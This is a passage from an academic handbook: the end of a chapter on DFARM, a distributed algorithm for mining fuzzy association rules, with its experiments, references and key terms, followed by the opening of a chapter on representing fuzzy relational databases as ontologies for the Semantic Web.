μLarge(y) = (y − 4.99)/0.03 if 4.99 < y ≤ 5.02; 1 if y > 5.02; 0 otherwise
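For reference, the piecewise definitions above translate directly into code. The sketch below implements the two fuzzy sets for Y from Equation 24; the five fuzzy sets for X in Equation 23 follow the same pattern.

def mu_small_y(y):
    """mu_Small(y) as defined in Equation 24."""
    if y <= 4.99:
        return 1.0
    if y <= 5.02:
        return (5.02 - y) / 0.03
    return 0.0

def mu_large_y(y):
    """mu_Large(y) as defined in Equation 24."""
    if y <= 4.99:
        return 0.0
    if y <= 5.02:
        return (y - 4.99) / 0.03
    return 1.0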
Figure 2. Uniform random data (X and Y values in the range 0 to 10)
Table 1. The interestingness of associations

Association
X = Very Small → Y = Small
X = Small → Y = Small
X = Medium → Y = Small
X = Large → Y = Small
X = Very Large → Y = Small
X = Very Small → Y = Large
X = Small → Y = Large
X = Medium → Y = Large
X = Large → Y = Large
X = Very Large → Y = Large
The membership functions of the fuzzy sets representing the domain of Y are the following (see Equation 24). The interestingness of the associations in the data is given in Table 1. Since the absolute values
of the adjusted residuals of all the associations are less than 1.96 (the two-tailed critical value of the standard normal distribution at the 5% level), we conclude that all of them are uninteresting at the 5% significance level. This illustrates the ability of our interestingness measure to reject random noise present in the data.
Figure 3. The second data set (points labeled by X = F/T and Y = F/T, with Z = F and Z = T distinguished)
Nevertheless, if the minimum support is set to 10% and the minimum confidence is set to 50%, association rule mining algorithms based on the support-confidence framework will find 4 of the 10 associations interesting. When compared to the use of support and confidence measures, which may accidentally mistake random patterns for interesting ones, the proposed measure is more effective.
Testing with Inherent Relationships Embedded in the Data

In our second experiment, we tested the proposed measure for effectiveness when it is used to discover high-order associations. In this data set, each tuple is characterized by three attributes, namely, X, Y, and Z. Each of them can take on two values: T and F. The data set contains 1,024 tuples and we generated the data according to the following relationships:

X = F ∧ Y = F → Z = F
X = F ∧ Y = T → Z = T
X = T ∧ Y = F → Z = T
X = T ∧ Y = T → Z = F

To further examine the performance of our interestingness measure in the presence of uncertainty, 25% random noise was added to the data set by randomly changing the value of Z in 256 tuples (i.e., 25% of all tuples) from F to T and vice versa. Figure 3 shows the data.
The association rules discovered based on the proposed interestingness measure together with their supports and confidences are given in Table 2. As shown in Table 2, our interestingness measure is able to discover the association rules that reflect exactly the inherent relationships embedded in the data. However, if the minimum support is set to 20% and the minimum confidence is set to 25%, as used in Srikant and Agrawal (1996), association rule mining algorithms adopting the support-confidence framework cannot find any of these associations. This demonstrates a weakness of user-supplied thresholds: if a threshold is set too high, a user may miss some useful rules (e.g., the test with the data set presented in this subsection); if it is set too low, the user may be overwhelmed by many irrelevant ones (e.g., the test with the data set discussed in the last subsection).

An Evaluation of Scalability
The databases used in our experiments on scalability are synthetic data generated using the tool provided by IBM (IBM Quest Data Mining Project, 1996). Each tuple in the databases is characterized by nine attributes. Of the nine attributes, three are discrete and six are continuous.
Table 2. The association rules discovered in the second data set

Association Rule
X = F ∧ Y = F → Z = F
X = F ∧ Y = F → Z = T
X = F ∧ Y = T → Z = F
X = F ∧ Y = T → Z = T
X = T ∧ Y = F → Z = F
X = T ∧ Y = F → Z = T
X = T ∧ Y = T → Z = F
X = T ∧ Y = T → Z = T
In order to evaluate the performance of DFARM, we also implemented count distribution in our test bed using PVM. We chose to implement count distribution because the experimental results presented in Agrawal and Shafer (1996) show that the performance of count distribution is superior to data distribution and candidate distribution. For each database, we discretized the domains of continuous attributes into several intervals, and mapped the
values of discrete attributes and the intervals of discretized continuous attributes into integers. We then applied count distribution to the transformed data. Since count distribution finds frequent item sets based on the support constraint, we applied it to the databases using various minimum supports so as to evaluate how its performance is affected by the setting of minimum support.
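As an illustration of this preprocessing step, the short sketch below assigns integer codes to discrete values and to the intervals of a discretized continuous attribute and then encodes one record; the attribute names, interval boundaries, and helper names are assumptions made up for the example.

def build_mapping(discrete_values, interval_bounds):
    """Assign consecutive integer codes to discrete attribute values and to the
    discretized intervals of continuous attributes (intervals kept in order)."""
    mapping, code = {}, 0
    for attr, values in discrete_values.items():
        for v in values:
            mapping[(attr, v)] = code
            code += 1
    for attr, bounds in interval_bounds.items():
        for lo, hi in bounds:
            mapping[(attr, (lo, hi))] = code
            code += 1
    return mapping

def encode_record(record, mapping):
    """Return the integer codes (items) that describe one record."""
    items = []
    for (attr, value), code in mapping.items():
        if isinstance(value, tuple):
            lo, hi = value
            if lo <= record[attr] <= hi:
                items.append(code)
        elif record[attr] == value:
            items.append(code)
    return items

# Hypothetical example with one discrete and one discretized continuous attribute.
mapping = build_mapping({"Marital Status": ["Unmarried", "Married"]},
                        {"Wage": [(0, 30000), (30001, 60000), (60001, 10**9)]})
items = encode_record({"Marital Status": "Married", "Wage": 42000}, mapping)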
Figure 4. The size-up performance: (a) execution time (sec.) against the number of tuples (in millions); (b) size-up against the number of tuples (in millions). Curves are shown for DFARM and for count distribution (CD) with minimum supports of 2%, 1.5%, 1%, and 0.75%.
Size-Up

In our first experiment, we fixed the number of sites in the distributed system to 10. To evaluate the performance of DFARM and count distribution with respect to different database sizes, we increased the number of tuples from 1 million to 10 million in our experiment. Figure 4 shows the performance of DFARM and count distribution as the database size increases. In addition to the
absolute execution times, we plot the size-up, which is the execution time normalized with respect to the execution time for 1 million tuples in Figure 4 (CD (x%) denotes running count distribution with minimum support x%). As shown in Figure 4, DFARM scales almost linearly in this experiment. When the database size increases, more and more I/O (input/output) and CPU (central processing unit) processing are required to (a) scan the database to obtain the fuzzy local counts and (b) compute the interestingness
measure for identifying interesting associations. The amount of execution time spent in communication is more or less the same regardless of the database size because the number of associations is independent of the database size and only its fuzzy local counts are exchanged between different sites in the distributed system. This characteristic of the algorithm results in the reduction of the percentage of the overall execution time spent in communication. Since the I/O and CPU processing in DFARM scale linearly with the database size, it shows almost linear performance. This experiment also shows that the performance of DFARM is superior to count distribution with respect to different database sizes. Specifically, DFARM is 2.8 times faster than count distribution with minimum support 2%, and 7.6 times faster than count distribution with minimum support 0.75%.

Figure 5. The speedup performance: (a) execution time (sec.) against the number of sites; (b) speedup against the number of sites. Curves are shown for DFARM and for count distribution (CD) with minimum supports of 2%, 1.5%, 1%, and 0.75%.
Speedup

In our second experiment, we fixed the database size to 2 million tuples. To evaluate the performance of DFARM and count distribution with respect to different numbers of sites in the distributed system, we increased the number of sites from 1 to 10 in our experiment. Figure 5 shows their performance as the number of sites increases. In addition to the absolute execution times, we plot the speedup, which is the execution time normalized with respect to the execution time for a single site, in Figure 5. As shown in Figure 5, DFARM exhibits very good speedup performance in this experiment. In particular, when there are m sites in the distributed system, it shortens the execution time to about 1/m of the execution time for a single site. Nonetheless, given the same amount of data, the speedup performance deteriorates as the number of sites in the distributed system increases. It is because the communication time becomes a significant portion of the overall execution time in comparison to
the relatively small processing time for the small amount of data to process at each site. This experiment also shows that DFARM outperforms count distribution with respect to different numbers of sites in the distributed system. Specifically, when there are two sites in the distributed system, DFARM is 2.7 times faster than count distribution with minimum support 2%, and 7.4 times faster than count distribution with minimum support 0.75%; when there are 10 sites in the distributed system, DFARM is 3 times faster than count distribution with minimum support 2%, and 8.3 times faster than count distribution with minimum support 0.75%.
Scale-Up

In this experiment, we fixed the size of the database partition at a site to 1 million tuples. We increased the number of sites in the distributed system from 1 to 10. Figure 6 shows the performance of DFARM as the number of sites increases. In addition to the absolute execution time, we plot the scale-up, which is the execution time normalized with respect to the execution time for a single site, in Figure 6. As shown in Figure 6, DFARM has very good scale-up performance. Since the number of associations it finds does not change when the database size increases, the I/O and CPU processing at each site remains constant. The execution time increases slightly as the database size and the number of sites increase. The small increment in execution time is due to the increase in the communication overhead when there are more and more sites in the distributed system. This experiment also shows that DFARM can better handle larger databases when more processors are available when compared to count distribution. DFARM is 2.7 times faster than count distribution with minimum support 2%, and 7.4 times faster than count distribution with minimum support 0.75%.
Figure 6. The scale-up performance: (a) execution time (sec.) against the number of sites; (b) scale-up against the number of sites. Curves are shown for DFARM and for count distribution (CD) with minimum supports of 2%, 1.5%, 1%, and 0.75%.
CONCLUSION

In this chapter, we introduce a new distributed algorithm, called DFARM, for mining fuzzy association rules from very large databases. DFARM employs an objective interestingness measure to discriminate interesting and uninteresting associations. It is shown to be very effective in identifying
interesting associations in noisy data. It also has the advantage that it does not require users to specify any thresholds, which could otherwise probably be found only by trial and error. In addition to the ability to discover interesting associations in databases, DFARM exploits the high scalability of distributed systems to better handle very large databases. We implemented DFARM
in a distributed system using PVM. We applied it to several databases to evaluate its effectiveness and scalability performance. The results of our experiments on scalability demonstrate that DFARM has very good size-up, speedup, and scale-up performance.
REFERENCES

Agrawal, R., Imielinski, T., & Swami, A. (1993). Mining association rules between sets of items in large databases. In Proceedings of the ACM SIGMOD International Conference on Management of Data (pp. 207-216). Agrawal, R., & Shafer, J. C. (1996). Parallel mining of association rules. IEEE Transactions on Knowledge and Data Engineering, 8(6), 962-969. Agrawal, R., & Srikant, R. (1994). Fast algorithms for mining association rules. In Proceedings of the 20th International Conference on Very Large Data Bases (pp. 487-499). Au, W.-H., & Chan, K. C. C. (2001). Classification with degree of membership: A fuzzy approach. In Proceedings of the First IEEE International Conference on Data Mining (pp. 35-42). Au, W.-H., & Chan, K. C. C. (2003). Mining fuzzy association rules in a bank-account database. IEEE Transactions on Fuzzy Systems, 11(2), 238-248. Au, W.-H., Chan, K. C. C., & Wong, A. K. C. (2006). A fuzzy approach to partitioning continuous attributes for classification. IEEE Transactions on Knowledge and Data Engineering, 18(5), 715-719. Carrasco, R. A., Vila, M. A., Galindo, J., & Cubero, J. C. (2000). FSQL: A tool for obtaining fuzzy dependencies. In Proceedings of the Eighth International Conference on Information Processing and Management of Uncertainty in Knowledge-Based Systems (pp. 1916-1919).
Chan, K. C. C., & Au, W.-H. (1997). Mining fuzzy association rules. In Proceedings of the Sixth International Conference on Information and Knowledge Management (pp. 209-215). Chan, K. C. C., & Au, W.-H. (2001). Mining fuzzy association rules in a database containing relational and transactional data. In A. Kandel, M. Last, & H. Bunke (Eds.), Data mining and computational intelligence (pp. 95-114). New York: Physica-Verlag. Delgado, M., Marín, N., Sánchez, D., & Vila, M.A. (2003). Fuzzy association rules: General model and applications. IEEE Transactions on Fuzzy Systems, 11(2), 214-225. Geist, A., Beguelin, A., Dongarra, J., Jiang, W., Manchek, R., & Sunderam, V. (1994). PVM: Parallel virtual machine. A user’s guide and tutorial for networked parallel computing. Cambridge, MA: MIT Press. Haberman, S. J. (1973). The analysis of residuals in cross-classified tables. Biometrics, 29(1), 205-220. Han, E.-H., Karypis, G., & Kumar, V. (1997). Scalable parallel data mining for association rules. In Proceedings of the ACM SIGMOD International Conference on Management of Data (pp. 277-288). Han, J., & Kamber, M. (2001). Data mining: Concepts and techniques. San Francisco: Morgan Kaufmann. Han, J., Pei, J., & Yin, Y. (2000). Mining frequent patterns without candidate generation. In Proceedings of the ACM SIGMOD International Conference on Management of Data (pp. 1-12). Hand, D., Mannila, H., & Smyth, P. (2001). Principles of data mining. Cambridge, MA: The MIT Press. Hirota, K., & Pedrycz, W. (1999). Fuzzy computing for data mining. Proceedings of the IEEE, 87(9), 1575-1600.
Hong, T. P., Kuo, C. S., & Chi, S. C. (1999). Mining association rules from quantitative data. Intelligent Data Analysis, 3(5), 363-376. IBM Quest Data Mining Project. (1996). Quest synthetic data generation code. Retrieved October 12, 2001, from http://www.almaden.ibm.com/cs/quest/syndata.html Kuok, C.-M., Fu, A., & Wong, M. H. (1998). Mining fuzzy association rules in databases. SIGMOD Record, 27(1), 41-46. Liu, B., Hsu, W., & Ma, Y. (1998). Integrating classification and association rule mining. In Proceedings of the Fourth International Conference on Knowledge Discovery and Data Mining (pp. 80-86). MacKay, D. J. C. (2003). Information theory, inference, and learning algorithms. Cambridge, United Kingdom: Cambridge University Press. Maimon, O., Kandel, A., & Last, M. (1999). Information-theoretic fuzzy approach to knowledge discovery in databases. In R. Roy, T. Furuhashi, & P. K. Chawdhry (Eds.), Advances in soft computing: Engineering design and manufacturing (pp. 315-326). London: Springer-Verlag. Mannila, H., Toivonen, H., & Verkamo, A. I. (1994). Efficient algorithms for discovering association rules. In Proceedings of the AAAI Workshop on Knowledge Discovery in Databases (pp. 181-192). Mendel, J. M. (1995). Fuzzy logic systems for engineering: A tutorial. Proceedings of the IEEE, 83(3), 345-377. Osteyee, D. B., & Good, I. J. (1974). Information, weight of evidence, the singularity between probability measures and signal detection. Berlin, Germany: Springer-Verlag. Park, J. S., Chen, M.-S., & Yu, P. S. (1995a). An efficient hash-based algorithm for mining association rules. In Proceedings of the ACM SIGMOD
2446
International Conference on Management of Data (pp. 175-186). Park, J. S., Chen, M.-S., & Yu, P. S. (1995b). Efficient parallel data mining for association rules. In Proceedings of the Fourth International Conference on Information and Knowledge Management (pp. 31-36). Savasere, A., Omiecinski, E., & Navathe, S. (1995). An efficient algorithm for mining association rules in large databases. In Proceedings of the 21st International Conference on Very Large Data Bases (pp. 432-444). Shintani, T., & Kitsuregawa, M. (1996). Hash based parallel algorithms for mining association rules. In Proceedings of the Fourth International Conference on Parallel and Distributed Information Systems (pp. 19-30). Smyth, P., & Goodman, R. M. (1992). An information theoretic approach to rule induction from databases. IEEE Transactions on Knowledge and Data Engineering, 4(4), 301-316. Srikant, R., & Agrawal, R. (1996). Mining quantitative association rules in large relational tables. In Proceedings of the ACM SIGMOD International Conference on Management of Data (pp. 1-12). Wong, A. K. C., & Wang, Y. (1997). High-order pattern discovery from discrete-valued data. IEEE Transactions on Knowledge and Data Engineering, 9(6), 877-893. Yager, R. R. (1991). On linguistic summaries of data. In G. Piatetsky-Shapiro & W. J. Frawley (Eds.), Knowledge discovery in databases (pp. 347-363). Menlo Park, CA: AAAI/MIT Press. Yen, J., & Langari, R. (1999). Fuzzy logic: Intelligence, control, and information. Upper Saddle River, NJ: Prentice-Hall. Zhang, W. (1999). Mining fuzzy quantitative association rules. In Proceedings of the 11th IEEE
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
International Conference on Tools with Artificial Intelligence (pp. 99-102).
KEY TERMS

Adjusted Residual: A statistic defined as a function of the difference between the actual and the expected number of tuples characterized by different linguistic variables (attributes) and linguistic terms (attribute values). It can be used as an interestingness measure (one common form is sketched after this list).

Associative Classification: A classification method based on association rules. An association rule with the class label as its consequent provides a clue that a tuple satisfying its antecedent belongs to a specific class. It can therefore be used as the basis of classification.

Fuzzy Association Rule: A fuzzy association rule involves linguistic terms (fuzzy sets) in its antecedent and/or consequent.

Fuzzy Partitioning: A methodology for generating fuzzy sets to represent the underlying data. Fuzzy partitioning techniques can be classified into three categories: grid partitioning, tree partitioning, and scatter partitioning. Of these, grid partitioning is the most commonly used in practice, particularly in system control applications. Grid partitioning forms a partition by dividing the input space into several fuzzy slices, each of which is specified by a membership function for each feature dimension.

Interestingness Measure: An interestingness measure represents how interesting an association is. Support is an example of an interestingness measure.

Negative Association Rule: A negative association rule's antecedent and consequent show a negative association: if its antecedent is satisfied, it is unlikely that its consequent will be satisfied.

Positive Association Rule: A positive association rule's antecedent and consequent show a positive association: if its antecedent is satisfied, it is likely that its consequent will be satisfied.
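For reference, one common form of the adjusted residual is sketched below, following the standard adjusted (standardized) residual for cross-classified tables; the chapter's exact definition may differ. Here $o_{ij}$ and $e_{ij}$ denote the observed and expected numbers of tuples for the cell formed by the $i$-th linguistic term of one attribute and the $j$-th term of another, $r_i$ and $c_j$ the corresponding marginal totals, and $N$ the total number of tuples:

$$
d_{ij} \;=\; \frac{o_{ij} - e_{ij}}{\sqrt{e_{ij}\left(1 - \dfrac{r_i}{N}\right)\left(1 - \dfrac{c_j}{N}\right)}},
\qquad e_{ij} = \frac{r_i\, c_j}{N}.
$$

A value of $d_{ij}$ far above (below) zero, for example beyond $\pm 1.96$, suggests a positive (negative) association between the two terms.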
This work was previously published in the Handbook of Research on Fuzzy Information Processing in Databases, edited by J. Galindo, pp. 685-705, copyright 2008 by Information Science Reference (an imprint of IGI Global).
Chapter 8.5
Looking for Information in Fuzzy Relational Databases Accessible Via Web

Carmen Martínez-Cruz, University of Jaén, Spain
Ignacio José Blanco, University of Granada, Spain
M. Amparo Vila, University of Granada, Spain
characteristics must be explicitly defined to enable this kind of information to be accessed. In addition, we will present an ontology which allows the fuzzy structure of a fuzzy database schema to be represented so that fuzzy data from FDBMSs can also be made available in the Semantic Web.
INTRODUCTION

The Semantic Web is the result of extending the standard Web with languages, information, and resources to enable us to extract information about the meaning of the Web contents automatically (Berners-Lee, Hendler, & Lassila, 2001). This content can be stored in different formats, for example, Web documents, semi-structured schemas, or dynamic data (Hendler, Berners-Lee, & Miller, 2002), as shown in Figure 1. In the Semantic Web, each information source is extended with a structured representation of its semantics (or its meaning). There are several approaches for this (Finin, Mayfield, Joshi, Cost, & Fink, 2005), but one of the most widely used representations is the ontology concept. An ontology is a formal description of the discourse domain of a concrete problem, and the intention is for it to be shared between different applications. One of its advantages is that it can be expressed in a language (mostly based on first-order logic) which can be used for reasoning (Gómez-Pérez, Férnandez-López, & Corcho-García, 2003b; Noy, 2004; Staab & Studer, 2004). A dynamic Web page is a type of Web content which is generated by querying a database (usually using technologies such as JSP, ASP, or
Figure 1. Comparing documents retrieved from the Web and from the semantic Web
representation can be very useful in the search and retrieval process, as an alternative result to classical data. Other alternative results can be references to existing databases (when their schemas are known) or client applications which can enrich the resulting answer. Final users could then choose the answers they need. Fuzzy databases representing imprecise information (Blanco, Martinez-Cruz, Serrano, & Vila, 2005b; Ma, 2005) are also part of the information which can be shared in the Semantic Web. This representation allows us to store uncertain and imprecise data together with classical data. However, accessing the database information becomes more complicated when fuzzy information is incorporated into the problem, as shown in Blanco et al. (2005b). Agents need to know about the metadata of the fuzzy database in order to search for information within it. Representation and manipulation of fuzzy data in the Semantic Web bring certain advantages to Web search. One such advantage is the capability of including fuzzy information in the answers (including fuzzy database schemas), but the main one might well be the new opportunities that this type of information adds to the process of integrating data from heterogeneous sources and formats. The use of fuzzy databases in the Semantic Web, however, is closely connected to their formal representation. An ontology representing a fuzzy database can be seen as an interface (Blanco, Martínez-Cruz, Marín, & Vila, 2005a; Calero, Ruiz, Baroni, Abreu, & Piattini, 2005; Perez de Laborda & Conrad, 2005) between the database and the Semantic Web. This interface separates the data representation from its storage and simplifies its definition for accessing it. The resulting ontology represents the metaclasses that define the information structure (the fuzzy database catalog) and the metaclasses containing the stored fuzzy data (the fuzzy database schema). This ontology can be treated homogeneously with all the ontologies in
the Web, that is, it can be shared, merged, pruned, or evaluated (Gómez-Pérez et al., 2003b). The second section of this chapter briefly describes the main topics relating to fuzzy database integration, and describes various concepts about fuzzy databases and the relation between ontologies and relational databases. In the third section, we propose an ontology as an interface for integrating fuzzy databases into the Semantic Web, and also include an example of a fuzzy schema representation. The final section discusses new trends and presents our conclusions.
BACKGROUND

While the Web has brought with it new challenges for exchanging, sharing, publishing, and querying information, it is not without its drawbacks; for example, it does not allow semantics to be included in the data retrieved, query results are huge, searches are imprecise, and so forth (for further details, see Lausen and Stollberg's work (2004)). Machine-processable information in the Web requires new technologies (Berners-Lee et al., 2001), and some of these technologies are for structuring Web information contents, such as XML or XML-S. However:
• Web content cannot be determined;
• Semantic queries cannot be made because Web pages cannot be interpreted; and
• Intelligent agents cannot obtain significant information.
The Semantic Web was proposed as a solution to these problems, and as many researchers have noted (Berners-Lee et al., 2001; Goble, 2003), this technology is capable of making Web information content understandable and processable by computers and humans. The Web can be extended to include semantics using one of these two approaches (Sheth, Ramakrishnan, & Thomas, 2005): ontologies or annotations.
Figure 2. Semantic Web users and different forms of semantic annotation of Web contents
The first of these allows the Web content to be represented using the knowledge representation mechanism known as ontologies (see details in the following subsection). This method includes the semantics of the page by attaching the ontology to the page or by including the ontology code in it (Finin et al., 2005). However, McCool (2005) identified certain problems with this solution, which included:
• the complexity of the Semantic Web;
• poor user participation;
• the development of very poor applications; and
• restrictive ontology languages.
Figure 2 describes the Semantic Web’s common users and the way in which semantic contents are defined in Web pages. The second solution presents annotations about the Web page content and vocabulary. This solution (McCool, 2006) reduces the complexity of the Semantic Web, retrieves faster query results, and promotes greater participation of Web users and developers. One drawback, however,
is that it lacks the rich expressiveness provided by ontologies. Nevertheless, the Semantic Web remains an alternative to the Classic Web and allows all the information that this contains to be accessed. Web data is represented in many different formats: in the form of documents (e.g., PDF, WORD), as plain text, HTML pages, XML documents, dynamic Web pages (e.g., JSP, ASP, PHP), FLASH contents, libraries, executables, interfaces or front-end pages, and so forth (see Figure 1). We can also find simple data or metadata, access databases, or infer knowledge from them, and we need to define technologies to access all this information in the way and format required for each case. In this chapter, we will attempt to incorporate the information contained in fuzzy databases into the Semantic Web. This information, like classic information, is stored in different DBMSs (DataBase Management Systems) and is represented using schemas. Schemas representing fuzzy and classic information could be retrieved in the Semantic Web as simple data or tuples, and agents and Web users can then use such schemas to search semantic information in DBMSs using SQL Web interfaces. These schemas are also used for integration with other data structures such as ontologies, XML schemas, or other schemas coming from heterogeneous sources.
Ontologies vs. Databases

Many definitions of the ontology concept have been proposed in recent years (Gómez-Pérez et al., 2003b). Studer, Benjamins, and Fensel (1998) define an ontology as a formal, explicit specification of a shared conceptualization, where:
• formal means that it is machine readable;
• explicit specification means that the concepts, properties, relations, functions, constraints, and axioms are explicitly defined;
• shared means that knowledge must be consensual; and
• conceptualization means that an ontology must be an abstract model and a simplified view of some phenomenon in the world that we want to represent.
This definition summarizes the essence of an ontology. Other definitions of ontologies are very similar to the most frequently referenced ones, given by Gruber (1993) and Guarino (1995, 1998). Ontologies are introduced in the Semantic Web as the main mechanism for describing the content of a Web page (Chandrasekaran, Josephson, & Benjamins, 1999). This description can be made using different languages (Duineveld, Stoter, Weiden, Kenepa, & Benjamins, 2000; Gómez-Pérez, Férnandez-López, & Corcho-García, 2003a; Su & Ilebrekke, 2002). Most of these are based on first-order logic (FOL) (such as OWL (Antoniou & Harmelen, n.d.), RDF (Resource Description Framework (RDF), 1999), KIF, etc.) and make the definition process very tedious. The most popular are the frame-based languages implemented in ontology management systems (OMS) such as Protégé (Stanford Medical Informatics at the Stanford University School of Medicine, n.d.), WebOde (Arperez, Corcho, Fernandez-López, & Gómez-Pérez, 2001; Ontological Engineering Group (OEG) from the Artificial Intelligence Department of the Computer Science Faculty (FI) from the Technical University of Madrid (Spain),
n.d.;), Ontolingua (Stanford University, n.d.), or WebOnto (Open University, n.d.) amongst others. There are, however, drawbacks to all representation methods. FOL-based languages are too complex to be managed, but they are very good at inferring knowledge, and they are independent of the application tool. OMS, meanwhile, represent a very easy ontology development interface, but representations are deeply dependent on the tool. On the other hand, these systems do allow translations to be made into most FOL languages, thereby avoiding syntax mistakes. A detailed classification of ontology representation techniques can be seen in Partners (2004). Several classifications of ontologies have been given by many authors (Lassila & McGuinness, 2002; Roche, 2003; Steve, Gangemi, & Pisanelli, 1998), and in particular we would like to mention Guarino’s (Steve et al., 1998) categorization due to its simplicity, and Lassila and McGuinness’s (2002), which has become a reference metric to define what can be considered an ontology or not. In Gómez-Pérez et al. (2003b), there is a brief summary of these classifications, whereby they are divided into those based on the internal structure or on the subject of conceptualization. This categorization (a brief resume of this is shown in Figure 3) highlights the representation ontologies that define the frame where the remaining ontologies can be defined. General ontologies represent general common knowledge about a certain subject, and domain ontologies allow us to define knowledge about a specific domain. Ontologies should provide consensual knowledge about a certain domain or area, and theoretically, these should be shared and populated so that this knowledge can be interchanged by the community. Such ontologies would allow common applications to be developed thanks to their compatible formats. Current work, however, demonstrates that each enterprise, project, or study develops its own ontology, uses its own language, and implements its own applications. General purpose ontologies (such as CYC (Lennat, 1995))
Figure 3. Basic Ontology Categorization
failed due to their low acceptance (McCool, 2005; Noy & Hafner, 1997). New trends in ontology representation are leading towards the integration of ontologies using matching and mapping processes (Choi, Song, & Han, 2006). A large number of database matching algorithms and studies have been revived in order to use similar developments with ontologies (Hai, 2005; Ma, 2005; Mena & Illarramendi, 2001; Staab & Studer, 2004). There is a great deal of debate about whether databases can be considered like ontologies when they represent concrete domain knowledge. Some trends consider database schemas to be lightweight ontologies (Breu & Ding, 2004; Gómez-Pérez et al., 2003b; Noy, 2004) because they lack the axioms which allow inferences to be made. Another considers ontologies and databases to be very similar, but they are not developed to represent the same aspect of the domain (Unchold & Gruninger, 2004). We consider database schemas to represent knowledge as ontologies do, but the resulting hierarchy could be a little flat, and logical axioms could represent different kinds of restrictions (these are database constraints). In general, however, they can be used to share stored information with the other Semantic Web users and agents, and to profit from the new technologies developed around ontologies.
A large number of proposals have been developed to enable database schemas to be accessed using ontologies. Most of these representations focus on populating the DB information in the Semantic Web. These approaches only use relational schemas as a back-end system for retrieving data from databases through ontologies as a query interface (An, Borgida, & Mylopoulos, 2004; Barrasa, Corcho, & Perez, 2003; Bizer, 2003; Dou & LePendu, 2006). The majority of these proposals define a declarative markup language for making the translation. Another uses a traditional closed program that establishes the mapping between the ontology and the database schema (such as Data Genie (Gennari, Nguyen, & Silberfein, n.d.)). Obviously this last choice is deeply dependent on the system and is non-scalable. However, the language-based method is more independent of the system, but programs also carry out the translation. Another kind of proposal is that which attempts to represent database metadata (the schemas) as ontologies. In Perez de Laborda and Conrad (2005), Perez de Laborda proposes the definition of only a few of the basic relational structures as a meta-ontology in order to communicate peer-topeer databases. Trinh, Barker, and Alhajj (2006) define most of the relational database structures as an ontology, and this representation includes
the DB constraints definition as the semantic restriction of the ontology. Another proposal is Sujatha et al.’s (Upadhyaya & Kumar, 2005) which represents relational database schemas using a tool that translates them into OWL. All these proposals define their ontologies using OWL. Dou, LePendu, Kim, and Qi (2006) develop a process for representing the main relational database structures in the Semantic Web, and this proposal is based on its own declarative language. Calero et al. (2005), on the other hand, described its own ontology using UML (they represented the ANSI Standard SQL 2003 (Information Technology Database Languages SQL, Parts 1 to 4 and 9 to 14, 2003)) and used it in order to represent relational database schemas. Another approach (Ontobase (Yabloko, Len, & Next Generation Software, n.d.)) develops a tool that automatically represents database contents as a meta-ontology. Ontobase is a Protégé plugin that imports database schemas to the protege representation format. In our proposal, we use Calero et al.’s (2005) ontology for representing the Standard ANSI SQL 2003. In addition, predefined data types are defined in this ontology proposal explicitly, and fuzzy data representation structures are also added to this ontology. This inclusion enables a formal definition to be made of the data structures required for representing fuzzy data in an RDBMS (relational database management system). The following section describes the extension of an RDBMS, before presenting the solutions adopted to make this information accessible in the Semantic Web.
Fuzzy Databases: FIRST Proposal

Many extensions to the relational model have been proposed since Zadeh (1965) introduced the concept of fuzzy sets for representing fuzzy data, and a summary of these extensions can be found in Ma (2005, 2006), Petry (1996), Chen (1999), Medina, Pons, and Vila (1994), and Galindo, Urrutia, and Piattini (2006). One of the extensions
mentioned consists of adding a membership degree to each tuple, as proposed by Baldwin and Zhou (1984) and Raju and Majumdar (1988). Buckles and Petry (1982) and Shenoi and Melton (1989) replace the equivalence between domain values by measures of nearness, such as similarity and proximity relationships, respectively. Prade and Testemale (1984) use possibility distributions for attribute values, and Umano and Fukami (1994) add the concept of non-applicable information. Zemankova and Kandel use the possibilistic model and a language to represent certainty and similarity relationships. Kacprzyk and Zadrozny (2001) and Rodríguez (2000) propose a language for fuzzy querying. Rundensteiner, Hawkes, and Bandler (1989) and Chen, Vandenbulcke, and Kerre (1992) use possibility distributions and resemblance relations in relational databases simultaneously. This representation is also used in Ma (2005) and in Medina et al. (1994), where the possibility value of each tuple in a fuzzy relation is exactly 1. In this last work, Medina et al. (1994) summarize most of the characteristics of the extensions listed above.
In Medina et al. (1994), Medina introduces GEFRED (a fuzzy data representation model) and FIRST (an architecture defined on a real RDBMS in Medina, Vila, Cubero, & Pons, 1995). This architecture defines new fuzzy data types and operations enabling the system to make fuzzy queries to the database using an extension of SQL called FSQL (Carrasco, Vila, & Galindo, 2003). An implementation for all relations in the system catalog and an example of how structures can be stored in the database are described in detail in Medina et al. (1995). In order to represent all the values in a generalized fuzzy domain, the authors introduced the following three new data types into a classic RDBMS (Medina et al., 1995):
1. Fuzzy Data Type 1, or CRISP data type, which represents those attributes storing classical data which can be fuzzily queried;
2. Fuzzy Data Type 2, or POSSIBILISTIC data type, which represents those attributes storing fuzzy data represented using trapezoidal possibility distributions (among others) defined on a numerical domain (see the sketch after this list); and
3. Fuzzy Data Type 3, or SCALAR data type, which allows attributes storing fuzzy data to be represented using resemblance relations defined on a non-numerical domain.
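As a concrete illustration of a Fuzzy Data Type 2 value, the following minimal sketch, written in Python purely for exposition (it is not part of the FIRST implementation), evaluates a trapezoidal possibility distribution; the ring-size label and the four defining points are invented for the example.

```python
def trapezoid(x, a, b, c, d):
    """Possibility degree of x under a trapezoidal distribution (a <= b <= c <= d).

    The degree rises linearly on [a, b], is 1 on [b, c], and falls linearly on [c, d].
    """
    if x <= a or x >= d:
        return 0.0
    if b <= x <= c:
        return 1.0
    if x < b:                      # rising edge
        return (x - a) / (b - a)
    return (d - x) / (d - c)       # falling edge


# Hypothetical linguistic label for a ring size, e.g. "M" (medium), on a diameter scale in mm.
medium = (15.0, 16.0, 17.5, 18.5)
print(trapezoid(17.0, *medium))    # 1.0: fully compatible with "M"
print(trapezoid(18.0, *medium))    # 0.5: partially compatible with "M"
```

In FSQL-style querying, such a degree would then be compared against a user-supplied fulfilment threshold.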
The aim of this extension is to provide a new set of capabilities to a classical RDBMS. This may be achieved when all accesses to relations in the data catalog are intercepted so that the new types and relations can be processed. Some new data catalog relations involved in this processing have therefore been defined, and this new set has been named the fuzzy meta-knowledge base (FMB). Each FMB relation is described below:
1. FUZZY COL LIST relation, storing information about attributes of relations that can contain fuzzy data or can be fuzzily queried;
2. FUZZY OBJECT LIST relation, storing common information about all the fuzzy concepts stored in the database, such as labels;
3. FUZZY LABEL DEF relation, storing the possibility distribution related to every fuzzy label defined in the database;
4. FUZZY APPROX MUCH relation, storing information for designing possibility distributions on predefined fuzzy concepts in the database, such as greater than and much greater than;
